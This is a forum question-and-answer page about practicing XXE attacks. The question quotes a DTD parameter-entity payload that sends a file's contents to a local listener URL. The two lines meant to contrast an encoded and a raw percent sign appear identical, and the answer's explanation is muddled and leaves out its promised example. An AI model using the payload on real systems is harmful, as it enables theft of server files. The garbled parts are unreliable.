Reputation: 63
When I was practicing XXE, I found it worked when I used the DTD ENTITY below to send my request.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
But it didn't work when I sent this.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
The difference between them is "%" and "%". I wonder why it didn't work when I used "%" directly here. Thank you.
Upvotes: 0
Views: 343
Reputation: 76859
This is an HTML encoded percent % sign (an escape sequence) within the PARAMETER ENTITY declaration of an XML file - and XML uses HTML encoding, in order not to break the syntax.
Quite the same in Android XML, which also knows %% ... there the raw % is commonly used for substitutions.
The canonical version would be:
Because XML syntax uses some characters for tags and attributes it is not possible to directly use those characters inside XML tags or attribute values.
And that's why some special characters in XML behave like a "reserved keyword".
Also see 15.3. Understanding XML DTDs.
Upvotes: 2